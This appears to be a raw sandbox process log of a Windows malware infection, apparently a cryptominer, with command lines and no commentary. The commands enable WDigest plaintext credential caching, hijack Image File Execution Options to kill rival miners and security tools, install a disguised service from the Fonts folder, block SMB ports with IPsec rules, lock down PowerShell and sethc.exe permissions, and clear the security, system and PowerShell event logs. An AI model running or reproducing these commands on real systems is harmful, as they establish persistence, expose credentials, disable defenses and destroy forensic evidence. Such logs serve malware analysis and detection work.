attrib.exe attrib -s -h -r -a C:\Windows\Fonts
2408reg.exe reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
2140reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
2200reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xmrig.exe" /v "deebugger" /d taskkill.exe /f
2252reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
2312reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
2372reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
2476sc.exe sc stop MetPipAtcivator
2536sc.exe sc delete MetPipAtcivator
2628sc.exe sc stop SetPipAtcivator
2700sc.exe sc delete SetPipAtcivator
2756sc.exe sc stop MicrosotMaims
2820sc.exe sc delete MicrosotMaims
2892sc.exe sc stop MicrosotMais
2964sc.exe sc delete MicrosotMais
3028taskkill.exe taskkill /f /t /im d1lhots.exe
2168taskkill.exe taskkill /f /t /im rundlls.exe
2340taskkill.exe taskkill /f /t /im dl1hots.exe
1712net1.exe C:\Windows\system32\net1 user mm123$ /del
2812net1.exe net1 user mm123$ /del
2520net1.exe C:\Windows\system32\net1 stop mssecsvc2.0
2760sc.exe sc delete mssecsvc2.0
2500net1.exe C:\Windows\system32\net1 stop mssecsvc2.1
2676sc.exe sc delete mssecsvc2.1
2944svchost.exe c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
3024svchost.exe c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
2968svchost.exe c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
2436svchost.exe c:\windows\Fonts\svchost.exe start MetPipAtcivator
2288reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
792PING.EXE ping 127.1 -n 5
2088sc.exe sc start MetPipAtcivator
3628sc.exe sc start MetPipAtcivator
3688net1.exe C:\Windows\system32\net1 share iPC$ /delete
3872net1.exe C:\Windows\system32\net1 share admin$ /delete
4084net1.exe C:\Windows\system32\net1 share c$ /delete
1568net1.exe C:\Windows\system32\net1 share d$ /delete
3284net1.exe C:\Windows\system32\net1 share e$ /delete
3340net1.exe C:\Windows\system32\net1 share f$ /delete
3608net1.exe C:\Windows\system32\net1 stop lanmanserver /y
3840sc.exe sc config lanmanserver start= DISABLED
2724sc.exe sc start PolicyAgent
1664sc.exe sc config PolicyAgent start= AUTO
1552sc.exe sc stop Graphipcs_PerfSvcs
3104sc.exe sc delete Graphipcs_PerfSvcs
2004WMIC.exe wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
3240attrib.exe attrib +s +h +r C:\Windows\svchost.exe
3592cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3720cacls.exe cacls C:\Windows\svchost.exe /d everyone
3908sc.exe sc stop conhost
4068sc.exe sc delete conhost
4040WMIC.exe wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
2452takeown.exe takeown /f C:\Windows\SysWOW64\conhost.exe /a
2040cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3144cacls.exe cacls C:\Windows\SysWOW64\conhost.exe /d everyone
2980reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
3448reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f
3480reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f
3704reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
3988reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f
4020reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
3008reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
2228reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
2404sc.exe sc start PolicyAgent
2712sc.exe sc config PolicyAgent start= AUTO
2512netsh.exe netsh ipsec static del all
416netsh.exe netsh ipsec static add policy name=Aliyun
2384netsh.exe netsh ipsec static add filterlist name=Allowlist
3760netsh.exe netsh ipsec static add filterlist name=denylist
1564netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
3452netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
4052netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
3500netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
2216netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
1676netsh.exe netsh ipsec static add filteraction name=Allow action=permit
3580netsh.exe netsh ipsec static add filteraction name=deny action=block
3832netsh.exe netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
3672netsh.exe netsh ipsec static set policy name=Aliyun assign=y
2916taskkill.exe taskkill /f /t /im lsars.exe /im lsacs.exe
3656taskkill.exe taskkill /f /t /im sqlservr.exe
3272WMIC.exe wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
2564attrib.exe attrib +s +h +r C:\Windows\Fonts\sqlservr.exe
3492cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3920cacls.exe cacls C:\Windows\Fonts\sqlservr.exe /d everyone
3632attrib.exe attrib +s +h +r C:\Windows\Fonts\csrss.exe
3084cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1484cacls.exe cacls C:\Windows\Fonts\csrss.exe /d everyone
1632WMIC.exe wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
3276attrib.exe attrib +s +h +r C:\Windows\lsass.exe
2844cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1780cacls.exe cacls C:\Windows\lsass.exe /d everyone
1800sc.exe sc stop "Application Layre Gateway Saervice"
2788sc.exe sc delete "Application Layre Gateway Saervice"
4124taskkill.exe taskkill /f /t /im boy.exe
4172attrib.exe attrib +s +h +r C:\Windows\boy.exe
4368cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4412cacls.exe cacls C:\Windows\boy.exe /d everyone
4480taskkill.exe taskkill /f /t /im powershell.exe
4536takeown.exe takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a
4728cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4776cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
4844cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4900cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
4968cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5024cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
5092cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4152cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
4236cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4308cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
4348cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4456cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system
4504takeown.exe takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
4656cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4664cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
4612cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4796cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
4860cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4960cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
4932cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5076cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
2784cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4216cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
4328cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4248cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
4408takeown.exe takeown /f C:\Windows\system32\sethc.exe /a
4452cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4564cacls.exe cacls C:\Windows\system32\sethc.exe /g Administrators:f
4576cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3556cacls.exe cacls C:\Windows\system32\sethc.exe /e /g Users:r
4804cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4872cacls.exe cacls C:\Windows\system32\sethc.exe /e /g Administrators:r
4864cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5072cacls.exe cacls C:\Windows\system32\sethc.exe /e /d SERVICE
5064cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4212cacls.exe cacls C:\Windows\system32\sethc.exe /e /d "network service"
1364cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4424cacls.exe cacls C:\Windows\system32\sethc.exe /e /g system:r
4484taskkill.exe taskkill /f /t /im wscript.exe
4568wevtutil.exe wevtutil cl "windows powershell"
4712wevtutil.exe wevtutil cl "security"
1904wevtutil.exe wevtutil cl "system"
4992svchost.exe c:\windows\Fonts\svchost.exe start MetPipAtcivator
508wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\tem.vbs"
3124